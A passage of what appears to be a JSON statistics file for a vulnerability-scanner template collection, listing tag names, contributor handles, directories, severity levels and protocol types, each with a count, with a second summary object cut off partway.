:1},{"name":"sitemap","count":1},{"name":"ftm","count":1},{"name":"gemweb","count":1},{"name":"gridx","count":1},{"name":"comfortel","count":1},{"name":"flickr","count":1},{"name":"faraday","count":1},{"name":"commvault","count":1},{"name":"binom","count":1},{"name":"currencyfreaks","count":1},{"name":"behat","count":1},{"name":"icinga","count":1},{"name":"trane","count":1},{"name":"nagios-xi","count":1},{"name":"bibliopac","count":1},{"name":"tekon","count":1},{"name":"etherpad","count":1},{"name":"leanix","count":1},{"name":"dapp","count":1},{"name":"daybyday","count":1},{"name":"wordnik","count":1},{"name":"customize-login-image","count":1},{"name":"skywalking","count":1},{"name":"limit","count":1},{"name":"oki","count":1},{"name":"ecshop","count":1},{"name":"karma","count":1},{"name":"mx","count":1},{"name":"dnssec","count":1},{"name":"hue","count":1},{"name":"quip","count":1},{"name":"b2evolution","count":1},{"name":"flureedb","count":1},{"name":"rudloff","count":1},{"name":"peoplesoft","count":1},{"name":"nuget","count":1},{"name":"thedogapi","count":1},{"name":"goahead","count":1},{"name":"polarisft","count":1},{"name":"solman","count":1},{"name":"piano","count":1},{"name":"jspxcms","count":1},{"name":"nvrmini","count":1},{"name":"secnet","count":1},{"name":"extremenetworks","count":1},{"name":"mongo-express","count":1},{"name":"webasyst","count":1},{"name":"ektron","count":1},{"name":"aniapi","count":1},{"name":"orbintelligence","count":1},{"name":"webp","count":1},{"name":"gopher","count":1},{"name":"bitrise","count":1},{"name":"bravenewcoin","count":1},{"name":"foss","count":1},{"name":"iframe","count":1},{"name":"mapbox","count":1},{"name":"gocron","count":1},{"name":"mcloud","count":1},{"name":"ns","count":1},{"name":"emc","count":1},{"name":"mongoshake","count":1},{"name":"struts2","count":1},{"name":"dwsync","count":1},{"name":"chaos","count":1},{"name":"shoretel","count":1},{"name":"klog","count":1},{"name":"phpfusion","count":1},{"name":"shopware","count":1},{"name":"rsyncd","count":1},{"name":"vivotex","count":1},{"name":"connect-central","count":1},{"name":"interactsh","count":1},{"name":"whmcs","count":1},{"name":"malshare","count":1},{"name":"front","count":1},{"name":"gargoyle","count":1},{"name":"ptr","count":1},{"name":"tiny","count":1},{"name":"vertex","count":1},{"name":"stridercd","count":1},{"name":"biometrics","count":1},{"name":"processmaker","count":1},{"name":"fudforum","count":1},{"name":"groupoffice","count":1},{"name":"roteador","count":1},{"name":"asus","count":1},{"name":"cnvd2022","count":1},{"name":"bitcoinaverage","count":1},{"name":"orangeforum","count":1},{"name":"logontracer","count":1},{"name":"delta","count":1},{"name":"dotnetcms","count":1},{"name":"verint","count":1},{"name":"puppetdb","count":1},{"name":"wampserver","count":1},{"name":"kyan","count":1},{"name":"svn","count":1},{"name":"browserless","count":1},{"name":"guppy","count":1},{"name":"ncomputing","count":1},{"name":"appweb","count":1},{"name":"anchorcms","count":1},{"name":"saml","count":1},{"name":"chromium","count":1},{"name":"curcy","count":1},{"name":"diris","count":1},{"name":"ganglia","count":1},{"name":"postgres","count":1},{"name":"lumis","count":1},{"name":"svnserve","count":1},{"name":"satellian","count":1},{"name":"formcraft3","count":1},{"name":"pcoweb","count":1},{"name":"qvidium","count":1},{"name":"micro-user-service","count":1},{"name":"burp","count":1},{"name":"atg","count":1},{"name":"apcu","count":1},{"name":"xeams","count":1},{"name":"cvnd2018","count":1},{"name":"misconfiguration","count":1},{"name":"suprema","count":1},{"name":"savepage","count":1},{"name":"securityspy","count":1},{"name":"nweb2fax","count":1},{"name":"credential","count":1},{"name":"unauthenticated","count":1},{"name":"mediacloud","count":1},{"name":"zcms","count":1},{"name":"bible","count":1},{"name":"moonpay","count":1},{"name":"vercel","count":1},{"name":"bottle","count":1},{"name":"vtiger","count":1},{"name":"apim","count":1},{"name":"davantis","count":1},{"name":"gsm","count":1},{"name":"camunda","count":1},{"name":"rwebserver","count":1},{"name":"shopizer","count":1},{"name":"dompdf","count":1},{"name":"shopxo","count":1},{"name":"magicflow","count":1},{"name":"sofneta","count":1},{"name":"viewlinc","count":1},{"name":"ddownload","count":1},{"name":"alquist","count":1},{"name":"webshell4","count":1},{"name":"qts","count":1},{"name":"kubecost","count":1},{"name":"version","count":1},{"name":"manager","count":1},{"name":"bamboo","count":1},{"name":"mailer","count":1},{"name":"myanimelist","count":1},{"name":"zarafa","count":1},{"name":"udraw","count":1},{"name":"contentful","count":1},{"name":"threatq","count":1},{"name":"luftguitar","count":1},{"name":"upload","count":1},{"name":"websvn","count":1},{"name":"wordpress-country-selector","count":1},{"name":"oscommerce","count":1},{"name":"tbk","count":1},{"name":"webui","count":1},{"name":"minimouse","count":1},{"name":"mofi","count":1},{"name":"buddy","count":1},{"name":"axel","count":1},{"name":"tracing","count":1},{"name":"wing-ftp","count":1},{"name":"locations","count":1},{"name":"spotify","count":1},{"name":"dropbear","count":1},{"name":"activecollab","count":1},{"name":"richfaces","count":1},{"name":"stackstorm","count":1},{"name":"pihole","count":1},{"name":"jaspersoft","count":1},{"name":"ticketmaster","count":1},{"name":"wp-gdpr-compliance","count":1},{"name":"ubiquiti","count":1},{"name":"gilacms","count":1},{"name":"edms","count":1},{"name":"pkp-lib","count":1},{"name":"fortressaircraft","count":1},{"name":"tika","count":1},{"name":"casemanager","count":1},{"name":"wp-stats-manager","count":1},{"name":"reddit","count":1},{"name":"etherscan","count":1},{"name":"ucs","count":1},{"name":"vibe","count":1},{"name":"tuxedo","count":1},{"name":"geolocation","count":1},{"name":"homeautomation","count":1},{"name":"ntopng","count":1},{"name":"nagiosxi","count":1},{"name":"pippoint","count":1},{"name":"dreamweaver","count":1},{"name":"piwik","count":1},{"name":"sonarcloud","count":1},{"name":"patreon","count":1},{"name":"supervisor","count":1},{"name":"coinlayer","count":1},{"name":"hirak","count":1},{"name":"clearfy-cache","count":1},{"name":"lionwiki","count":1},{"name":"meraki","count":1},{"name":"shindig","count":1},{"name":"pubsec","count":1},{"name":"monday","count":1},{"name":"defectdojo","count":1},{"name":"nifi","count":1},{"name":"abbott","count":1},{"name":"blockfrost","count":1},{"name":"pricing-deals-for-woocommerce","count":1},{"name":"scs","count":1},{"name":"trilium","count":1},{"name":"juniper","count":1},{"name":"dapr","count":1},{"name":"workspace","count":1},{"name":"wordcloud","count":1},{"name":"lancom","count":1},{"name":"openx","count":1},{"name":"spidercontrol","count":1},{"name":"rollupjs","count":1},{"name":"siemens","count":1},{"name":"cmsimple","count":1},{"name":"binaryedge","count":1},{"name":"wiki","count":1},{"name":"buddypress","count":1},{"name":"memory-pipes","count":1},{"name":"ixbusweb","count":1},{"name":"st","count":1},{"name":"satellite","count":1},{"name":"openid","count":1},{"name":"cve2004","count":1},{"name":"autocomplete","count":1},{"name":"openv500","count":1},{"name":"secmail","count":1},{"name":"dahua","count":1},{"name":"airtable","count":1},{"name":"pendo","count":1},{"name":"collegemanagement","count":1},{"name":"web3","count":1},{"name":"officekeeper","count":1},{"name":"auxin-elements","count":1},{"name":"loganalyzer","count":1},{"name":"mgrng","count":1},{"name":"fuji","count":1},{"name":"gofile","count":1},{"name":"calendly","count":1},{"name":"launchdarkly","count":1},{"name":"buttercms","count":1},{"name":"teltonika","count":1},{"name":"rsa","count":1},{"name":"opennms","count":1},{"name":"ventrilo","count":1},{"name":"sarg","count":1},{"name":"shodan","count":1},{"name":"sh","count":1},{"name":"commscope","count":1},{"name":"phabricator","count":1},{"name":"lfw","count":1},{"name":"sftp","count":1},{"name":"powerjob","count":1},{"name":"datadog","count":1},{"name":"weglot","count":1},{"name":"duplicator","count":1},{"name":"phpwind","count":1},{"name":"darktrace","count":1},{"name":"audiocode","count":1},{"name":"jgraph","count":1},{"name":"qsan","count":1},{"name":"sauter","count":1},{"name":"adWidget","count":1},{"name":"shoppable","count":1},{"name":"incapptic-connect","count":1},{"name":"nimsoft","count":1},{"name":"docebo","count":1},{"name":"phpminiadmin","count":1},{"name":"librenms","count":1},{"name":"powercreator","count":1},{"name":"alchemy","count":1},{"name":"sony","count":1},{"name":"razor","count":1},{"name":"videoxpert","count":1},{"name":"wpcentral","count":1},{"name":"acexy","count":1},{"name":"archibus","count":1},{"name":"softaculous","count":1},{"name":"web-dispatcher","count":1},{"name":"clickhouse","count":1},{"name":"scimono","count":1},{"name":"arris","count":1},{"name":"scraperbox","count":1},{"name":"pypicloud","count":1},{"name":"smtp2go","count":1},{"name":"portainer","count":1},{"name":"kerbynet","count":1},{"name":"epm","count":1},{"name":"beanshell","count":1},{"name":"pulsesecure","count":1},{"name":"nsasg","count":1},{"name":"jhipster","count":1},{"name":"quantum","count":1},{"name":"htmli","count":1},{"name":"elevation","count":1},{"name":"bing","count":1},{"name":"apos","count":1},{"name":"m-files","count":1},{"name":"patheon","count":1},{"name":"drill","count":1},{"name":"workreap","count":1},{"name":"superwebmailer","count":1},{"name":"vanguard","count":1},{"name":"drive","count":1},{"name":"memcached","count":1},{"name":"bazarr","count":1},{"name":"nport","count":1},{"name":"webcenter","count":1},{"name":"junos","count":1},{"name":"taiga","count":1},{"name":"hetzner","count":1},{"name":"blackboard","count":1},{"name":"parentlink","count":1},{"name":"readme","count":1},{"name":"jumpcloud","count":1},{"name":"bonita","count":1},{"name":"citybook","count":1},{"name":"aircube","count":1},{"name":"mediumish","count":1},{"name":"objectinjection","count":1},{"name":"cse","count":1},{"name":"teradici","count":1},{"name":"triconsole","count":1},{"name":"beego","count":1},{"name":"amp","count":1},{"name":"webroot","count":1},{"name":"roundcube","count":1},{"name":"clockwork","count":1},{"name":"scrapestack","count":1},{"name":"opencti","count":1},{"name":"scraperapi","count":1},{"name":"looker","count":1},{"name":"ninja","count":1},{"name":"tieline","count":1},{"name":"xunchi","count":1},{"name":"wakatime","count":1},{"name":"kubeflow","count":1},{"name":"surveysparrow","count":1},{"name":"nozomi","count":1},{"name":"acontent","count":1},{"name":"micro","count":1},{"name":"narnoo-distributor","count":1},{"name":"razer","count":1},{"name":"tamronos","count":1},{"name":"zenrows","count":1},{"name":"intelbras","count":1},{"name":"eyelock","count":1},{"name":"streetview","count":1},{"name":"mozilla","count":1},{"name":"xamr","count":1},{"name":"block","count":1},{"name":"opensearch","count":1},{"name":"mdm","count":1},{"name":"xds","count":1},{"name":"neo4j","count":1},{"name":"netbiblio","count":1},{"name":"bacnet","count":1},{"name":"kvm","count":1},{"name":"ejs","count":1},{"name":"netic","count":1},{"name":"phpfastcache","count":1},{"name":"sicom","count":1},{"name":"webeditors","count":1},{"name":"ipdiva","count":1},{"name":"dixell","count":1},{"name":"mtheme","count":1},{"name":"xiuno","count":1},{"name":"facturascripts","count":1},{"name":"playable","count":1},{"name":"proxykingdom","count":1},{"name":"ecsimagingpacs","count":1}],"authors":[{"name":"dhiyaneshdk","count":679},{"name":"daffainfo","count":657},{"name":"pikpikcu","count":340},{"name":"pdteam","count":274},{"name":"geeknik","count":196},{"name":"dwisiswant0","count":171},{"name":"0x_akoko","count":169},{"name":"ritikchaddha","count":159},{"name":"pussycat0x","count":155},{"name":"princechaddha","count":151},{"name":"gy741","count":131},{"name":"arafatansari","count":98},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":60},{"name":"tess","count":60},{"name":"akincibor","count":51},{"name":"for3stco1d","count":47},{"name":"gaurang","count":42},{"name":"philippedelteil","count":36},{"name":"adam crosser","count":30},{"name":"c-sh0","count":26},{"name":"ice3man","count":26},{"name":"edoardottt","count":25},{"name":"organiccrap","count":24},{"name":"ffffffff0x","count":22},{"name":"righettod","count":22},{"name":"techbrunchfr","count":21},{"name":"theamanrawat","count":20},{"name":"cckuailong","count":17},{"name":"sullo","count":17},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"tenbird","count":13},{"name":"0ri2n","count":13},{"name":"johnk3r","count":13},{"name":"sharath","count":13},{"name":"melbadry9","count":12},{"name":"suman_kar","count":12},{"name":"random-robbie","count":12},{"name":"elsfa7110","count":11},{"name":"wdahlenb","count":11},{"name":"cyllective","count":11},{"name":"dogasantos","count":11},{"name":"hackergautam","count":10},{"name":"nadino","count":10},{"name":"meme-lord","count":10},{"name":"alph4byt3","count":10},{"name":"logicalhunter","count":10},{"name":"random_robbie","count":10},{"name":"oppsec","count":9},{"name":"emadshanab","count":9},{"name":"0x240x23elu","count":9},{"name":"veshraj","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"zh","count":8},{"name":"iamthefrogy","count":8},{"name":"amit-jd","count":7},{"name":"harshbothra_","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"caspergn","count":7},{"name":"dr_set","count":7},{"name":"techryptic (@tech)","count":7},{"name":"divya_mudgal","count":7},{"name":"leovalcante","count":7},{"name":"puzzlepeaches","count":6},{"name":"evan rubinstein","count":6},{"name":"forgedhallpass","count":6},{"name":"__fazal","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"nullfuzz","count":6},{"name":"lu4nx","count":6},{"name":"iamnoooob","count":6},{"name":"_0xf4n9x_","count":6},{"name":"imnightmaree","count":6},{"name":"ricardomaia","count":6},{"name":"rootxharsh","count":6},{"name":"pentest_swissky","count":6},{"name":"pathtaga","count":6},{"name":"nodauf","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"prajiteshsingh","count":5},{"name":"ganofins","count":5},{"name":"clem9669","count":5},{"name":"podalirius","count":5},{"name":"xelkomy","count":5},{"name":"panch0r3d","count":5},{"name":"scent2d","count":4},{"name":"incogbyte","count":4},{"name":"robotshell","count":4},{"name":"dadevel","count":4},{"name":"defr0ggy","count":4},{"name":"0xlittleboy","count":4},{"name":"3th1c_yuk1","count":4},{"name":"its0x08","count":4},{"name":"r3naissance","count":4},{"name":"wisnupramoedya","count":4},{"name":"e_schultze_","count":4},{"name":"tanq16","count":4},{"name":"h1ei1","count":4},{"name":"dolev farhi","count":4},{"name":"dudez","count":3},{"name":"mavericknerd","count":3},{"name":"jarijaas","count":3},{"name":"0w4ys","count":3},{"name":"andydoering","count":3},{"name":"mr-xn","count":3},{"name":"gitlab red team","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"ph33r","count":3},{"name":"lucasljm2001","count":3},{"name":"me9187","count":3},{"name":"atomiczsec","count":3},{"name":"hahwul","count":3},{"name":"sushantkamble","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"z3bd","count":3},{"name":"johnjhacking","count":3},{"name":"_generic_human_","count":3},{"name":"davidmckennirey","count":3},{"name":"fyoorer","count":3},{"name":"skeltavik","count":3},{"name":"alifathi-h1","count":3},{"name":"emenalf","count":3},{"name":"supras","count":3},{"name":"impramodsargar","count":3},{"name":"lark-lab","count":3},{"name":"powerexploit","count":3},{"name":"ekrause","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dr0pd34d","count":3},{"name":"binaryfigments","count":3},{"name":"arcc","count":3},{"name":"whoever","count":3},{"name":"splint3r7","count":3},{"name":"shifacyclewala","count":3},{"name":"fxploit","count":3},{"name":"unstabl3","count":3},{"name":"thardt-praetorian","count":2},{"name":"ehsahil","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"ajaysenr","count":2},{"name":"afaq","count":2},{"name":"0xsmiley","count":2},{"name":"zomsop82","count":2},{"name":"v0idc0de","count":2},{"name":"udit_thakkur","count":2},{"name":"cocxanh","count":2},{"name":"k11h-de","count":2},{"name":"sbani","count":2},{"name":"luci","count":2},{"name":"0xnirvana","count":2},{"name":"martincodes-de","count":2},{"name":"z0ne","count":2},{"name":"g4l1t0","count":2},{"name":"0xrudra","count":2},{"name":"0xelkomy","count":2},{"name":"fabaff","count":2},{"name":"cckuakilong","count":2},{"name":"r12w4n","count":2},{"name":"bananabr","count":2},{"name":"thezakman","count":2},{"name":"vavkamil","count":2},{"name":"rafaelwdornelas","count":2},{"name":"vsh00t","count":2},{"name":"socketz","count":2},{"name":"badboycxcc","count":2},{"name":"brenocss","count":2},{"name":"redteambrasil","count":2},{"name":"nuk3s3c","count":2},{"name":"uomogrande","count":2},{"name":"n-thumann","count":2},{"name":"ambassify","count":2},{"name":"bing0o","count":2},{"name":"kre80r","count":2},{"name":"bsysop","count":2},{"name":"dheerajmadhukar","count":2},{"name":"0xsapra","count":2},{"name":"dahse89","count":2},{"name":"huowuzhao","count":2},{"name":"foulenzer","count":2},{"name":"x1m_martijn","count":2},{"name":"paradessia","count":2},{"name":"y4er","count":2},{"name":"paperpen","count":2},{"name":"canberbamber","count":2},{"name":"mohammedsaneem","count":2},{"name":"manas_harsh","count":2},{"name":"ree4pwn","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"0xcrypto","count":2},{"name":"gevakun","count":2},{"name":"geekby","count":2},{"name":"nkxxkn","count":2},{"name":"github.com/its0x08","count":2},{"name":"lotusdll","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"danielmofer","count":2},{"name":"hackerarpan","count":2},{"name":"dbrwsky","count":2},{"name":"korteke","count":2},{"name":"w4cky_","count":2},{"name":"d4vy","count":2},{"name":"bernardofsr","count":2},{"name":"clarkvoss","count":2},{"name":"sy3omda","count":2},{"name":"pxmme1337","count":2},{"name":"swissky","count":2},{"name":"joshlarsen","count":2},{"name":"randomrobbie","count":2},{"name":"amsda","count":2},{"name":"0xprial","count":2},{"name":"kiblyn11","count":2},{"name":"kh4sh3i","count":2},{"name":"gal nagli","count":2},{"name":"codexlynx","count":2},{"name":"myztique","count":2},{"name":"moritz nentwig","count":2},{"name":"8arthur","count":2},{"name":"evergreencartoons","count":2},{"name":"666asd","count":2},{"name":"parth","count":2},{"name":"raesene","count":2},{"name":"koti2","count":2},{"name":"smaranchand","count":2},{"name":"convisoappsec","count":2},{"name":"taielab","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"joeldeleep","count":2},{"name":"bp0lr","count":2},{"name":"true13","count":2},{"name":"nvn1729","count":2},{"name":"hetroublemakr","count":2},{"name":"shiar","count":1},{"name":"sherlocksecurity","count":1},{"name":"orpheus","count":1},{"name":"piyushchhiroliya","count":1},{"name":"xshuden","count":1},{"name":"elitebaz","count":1},{"name":"zsusac","count":1},{"name":"0xd0ff9","count":1},{"name":"alex","count":1},{"name":"j33n1k4","count":1},{"name":"bartu utku sarp","count":1},{"name":"w0tx","count":1},{"name":"evan rubinstien","count":1},{"name":"2rs3c","count":1},{"name":"oscarintherocks","count":1},{"name":"djoevanka","count":1},{"name":"skylark-lab","count":1},{"name":"_c0wb0y_","count":1},{"name":"berkdusunur","count":1},{"name":"flag007","count":1},{"name":"alevsk","count":1},{"name":"carlosvieira","count":1},{"name":"kailashbohara","count":1},{"name":"ramkrishna sawant","count":1},{"name":"retr0","count":1},{"name":"nobody","count":1},{"name":"jas37","count":1},{"name":"kiransau","count":1},{"name":"compr00t","count":1},{"name":"miroslavsotak","count":1},{"name":"luskabol","count":1},{"name":"narluin","count":1},{"name":"akash.c","count":1},{"name":"igibanez","count":1},{"name":"regala_","count":1},{"name":"f1she3","count":1},{"name":"bad5ect0r","count":1},{"name":"remonsec","count":1},{"name":"mrcl0wnlab","count":1},{"name":"exceed","count":1},{"name":"5up3r541y4n","count":1},{"name":"jcockhren","count":1},{"name":"ahmetpergamum","count":1},{"name":"bywalks","count":1},{"name":"open-sec","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"thevillagehacker","count":1},{"name":"droberson","count":1},{"name":"dievus","count":1},{"name":"knassar702","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"elouhi","count":1},{"name":"_darrenmartyn","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"sicksec","count":1},{"name":"manasmbellani","count":1},{"name":"breno_css","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"anon-artist","count":1},{"name":"thebinitghimire","count":1},{"name":"lamscun","count":1},{"name":"apt-mirror","count":1},{"name":"noraj","count":1},{"name":"jrolf","count":1},{"name":"duty_1g","count":1},{"name":"natto97","count":1},{"name":"florianmaak","count":1},{"name":"ohlinge","count":1},{"name":"osamahamad","count":1},{"name":"paper-pen","count":1},{"name":"lingtren","count":1},{"name":"mah3sec_","count":1},{"name":"0xrod","count":1},{"name":"davidfegyver","count":1},{"name":"furkansenan","count":1},{"name":"shivampand3y","count":1},{"name":"zinminphy0","count":1},{"name":"intx0x80","count":1},{"name":"0xteles","count":1},{"name":"lixts","count":1},{"name":"geraldino2","count":1},{"name":"amanrawat","count":1},{"name":"fmunozs","count":1},{"name":"d0rkerdevil","count":1},{"name":"bjhulst","count":1},{"name":"shifacyclewla","count":1},{"name":"1nf1n7y","count":1},{"name":"ipanda","count":1},{"name":"akshansh","count":1},{"name":"liquidsec","count":1},{"name":"retr02332","count":1},{"name":"borna nematzadeh","count":1},{"name":"aaronchen0","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"ph33rr","count":1},{"name":"zandros0","count":1},{"name":"thelicato","count":1},{"name":"coldfish","count":1},{"name":"momen eldawakhly","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"petruknisme","count":1},{"name":"danigoland","count":1},{"name":"adrianmf","count":1},{"name":"arall","count":1},{"name":"alexrydzak","count":1},{"name":"vinit989","count":1},{"name":"shelld3v","count":1},{"name":"soyelmago","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"s1r1u5_","count":1},{"name":"unkl4b","count":1},{"name":"clment cruchet","count":1},{"name":"marcos_iaf","count":1},{"name":"sickwell","count":1},{"name":"kabirsuda","count":1},{"name":"hexcat","count":1},{"name":"tim_koopmans","count":1},{"name":"pdp","count":1},{"name":"exid","count":1},{"name":"mhdsamx","count":1},{"name":"daviey","count":1},{"name":"dk999","count":1},{"name":"pjborah","count":1},{"name":"mantissts","count":1},{"name":"ahmed abou-ela","count":1},{"name":"mass0ma","count":1},{"name":"xeldax","count":1},{"name":"husain","count":1},{"name":"udinchan","count":1},{"name":"ok_bye_now","count":1},{"name":"co0nan","count":1},{"name":"francescocarlucci","count":1},{"name":"hanlaomo","count":1},{"name":"x6263","count":1},{"name":"rotemreiss","count":1},{"name":"gboddin","count":1},{"name":"screamy","count":1},{"name":"viniciuspereiras","count":1},{"name":"kr1shna4garwal","count":1},{"name":"notsoevilweasel","count":1},{"name":"0xceeb","count":1},{"name":"secthebit","count":1},{"name":"sec_hawk","count":1},{"name":"toufik-airane","count":1},{"name":"sak1","count":1},{"name":"un-fmunozs","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"dhiyaneshdki","count":1},{"name":"opencirt","count":1},{"name":"ahmed sherif","count":1},{"name":"0ut0fb4nd","count":1},{"name":"blckraven","count":1},{"name":"willd96","count":1},{"name":"fopina","count":1},{"name":"push4d","count":1},{"name":"exploitation","count":1},{"name":"0xh7ml","count":1},{"name":"ling","count":1},{"name":"nytr0gen","count":1},{"name":"viondexd","count":1},{"name":"xstp","count":1},{"name":"makyotox","count":1},{"name":"y0no","count":1},{"name":"b0rn2r00t","count":1},{"name":"absshax","count":1},{"name":"arr0way","count":1},{"name":"rubina119","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"luqman","count":1},{"name":"rschio","count":1},{"name":"failopen","count":1},{"name":"prettyboyaaditya","count":1},{"name":"yashgoti","count":1},{"name":"yuansec","count":1},{"name":"alperenkesk","count":1},{"name":"s0obi","count":1},{"name":"hakluke","count":1},{"name":"nerrorsec","count":1},{"name":"justmumu","count":1},{"name":"omarkurt","count":1},{"name":"revblock","count":1},{"name":"majidmc2","count":1},{"name":"kurohost","count":1},{"name":"pudsec","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"charanrayudu","count":1},{"name":"c3l3si4n","count":1},{"name":"aresx","count":1},{"name":"realexp3rt","count":1},{"name":"_harleo","count":1},{"name":"p-l-","count":1},{"name":"patralos","count":1},{"name":"0h1in9e","count":1},{"name":"izn0u","count":1},{"name":"0xceba","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"mubassirpatel","count":1},{"name":"h4kux","count":1},{"name":"noamrathaus","count":1},{"name":"allenwest24","count":1},{"name":"miryangjung","count":1},{"name":"philippdelteil","count":1},{"name":"infosecsanyam","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"qlkwej","count":1},{"name":"deena","count":1},{"name":"tirtha","count":1},{"name":"b0yd","count":1},{"name":"pascalheidmann","count":1},{"name":"kareemse1im","count":1},{"name":"ggranjus","count":1},{"name":"mesaglio","count":1},{"name":"daffianfo","count":1},{"name":"iphantasmic","count":1},{"name":"pratik khalane","count":1},{"name":"rodnt","count":1},{"name":"luqmaan hadia","count":1},{"name":"amnotacat","count":1},{"name":"juicypotato1","count":1},{"name":"ransomsec","count":1},{"name":"couskito","count":1},{"name":"andysvints","count":1},{"name":"lrtk-coder","count":1},{"name":"affix","count":1},{"name":"ldionmarcil","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"noobexploiter","count":1},{"name":"rotembar","count":1},{"name":"nielsing","count":1},{"name":"yavolo","count":1},{"name":"bughuntersurya","count":1},{"name":"fq_hsu","count":1},{"name":"harshinsecurity","count":1},{"name":"0xtavian","count":1},{"name":"jbaines-r7","count":1},{"name":"tehtbl","count":1},{"name":"undefl0w","count":1},{"name":"dale clarke","count":1},{"name":"udyz","count":1},{"name":"shockwave","count":1},{"name":"b4uh0lz","count":1},{"name":"th3.d1p4k","count":1},{"name":"vzamanillo","count":1},{"name":"micha3lb3n","count":1},{"name":"evolutionsec","count":1},{"name":"ringo","count":1},{"name":"tea","count":1},{"name":"whynotke","count":1},{"name":"zhenwarx","count":1},{"name":"jiheon-dev","count":1},{"name":"rojanrijal","count":1},{"name":"aayush vishnoi","count":1},{"name":"ilovebinbash","count":1},{"name":"arm!tage","count":1},{"name":"andirrahmani1","count":1},{"name":"arjunchandarana","count":1},{"name":"official_blackhat13","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"lark lab","count":1},{"name":"calumjelrick","count":1},{"name":"ooooooo_q","count":1},{"name":"jbertman","count":1},{"name":"kiks7","count":1},{"name":"iampritam","count":1},{"name":"maximus decimus","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"ptonewreckin","count":1},{"name":"streetofhackerr007","count":1},{"name":"thesubtlety","count":1},{"name":"sshell","count":1},{"name":"erethon","count":1},{"name":"aringo","count":1},{"name":"act1on3","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"phyr3wall","count":1},{"name":"shreyapohekar","count":1},{"name":"elder tao","count":1},{"name":"yashanand155","count":1},{"name":"lethargynavigator","count":1},{"name":"8authur","count":1},{"name":"becivells","count":1},{"name":"hardik-rathod","count":1},{"name":"elmahdi","count":1},{"name":"cookiehanhoan","count":1},{"name":"jteles","count":1},{"name":"pry0cc","count":1},{"name":"tirtha_mandal","count":1},{"name":"jeya seelan","count":1},{"name":"hakimkt","count":1},{"name":"dawid-czarnecki","count":1},{"name":"httpvoid","count":1},{"name":"furkansayim","count":1},{"name":"af001","count":1},{"name":"jna1","count":1},{"name":"wabafet","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"jeya.seelan","count":1},{"name":"wlayzz","count":1},{"name":"nagli","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"manuelbua","count":1},{"name":"kaizensecurity","count":1},{"name":"schniggie","count":1},{"name":"notnotnotveg","count":1},{"name":"chron0x","count":1},{"name":"ola456","count":1},{"name":"brabbit10","count":1},{"name":"ofjaaah","count":1}],"directory":[{"name":"cves","count":1488},{"name":"exposed-panels","count":741},{"name":"vulnerabilities","count":517},{"name":"misconfiguration","count":322},{"name":"technologies","count":303},{"name":"exposures","count":299},{"name":"token-spray","count":235},{"name":"workflows","count":190},{"name":"default-logins","count":111},{"name":"file","count":77},{"name":"takeovers","count":68},{"name":"network","count":54},{"name":"iot","count":39},{"name":"miscellaneous","count":25},{"name":"cnvd","count":25},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"ssl","count":8},{"name":"headless","count":7}],"severity":[{"name":"info","count":1604},{"name":"high","count":1127},{"name":"medium","count":812},{"name":"critical","count":534},{"name":"low","count":249},{"name":"unknown","count":21}],"types":[{"name":"http","count":4170},{"name":"file","count":77},{"name":"network","count":68},{"name":"dns","count":17}]} +{"tags":[{"name":"cve","count":1526},{"name":"panel","count":747},{"name":"edb","count":575},{"name":"xss","count":533},{"name":"exposure","count":525},{"name":"lfi","count":518},{"name":"wordpress","count":460},{"name":"cve2021","count":365},{"name":"wp-plugin","count":355},{"name":"rce","count":343},{"name":"tech","count":319},{"name":"packetstorm","count":291},{"name":"cve2022","count":255},{"name":"wpscan","count":247},{"name":"token-spray","count":235},{"name":"cve2020","count":217},{"name":"misconfig","count":212},{"name":"","count":195},{"name":"unauth","count":188},{"name":"wp","count":177},{"name":"kev","count":167},{"name":"config","count":162},{"name":"cve2018","count":145},{"name":"cve2019","count":137},{"name":"joomla","count":135},{"name":"default-login","count":129},{"name":"oast","count":127},{"name":"apache","count":124},{"name":"iot","count":122},{"name":"authenticated","count":117},{"name":"sqli","count":111},{"name":"cve2010","count":111},{"name":"router","count":90},{"name":"files","count":89},{"name":"redirect","count":89},{"name":"login","count":88},{"name":"devops","count":75},{"name":"takeover","count":74},{"name":"network","count":73},{"name":"token","count":73},{"name":"ssrf","count":72},{"name":"cve2017","count":70},{"name":"cms","count":67},{"name":"auth-bypass","count":64},{"name":"file","count":63},{"name":"oracle","count":62},{"name":"intrusive","count":59},{"name":"install","count":57},{"name":"seclists","count":56},{"name":"disclosure","count":54},{"name":"cisco","count":49},{"name":"cve2016","count":49},{"name":"oss","count":49},{"name":"google","count":48},{"name":"cve2015","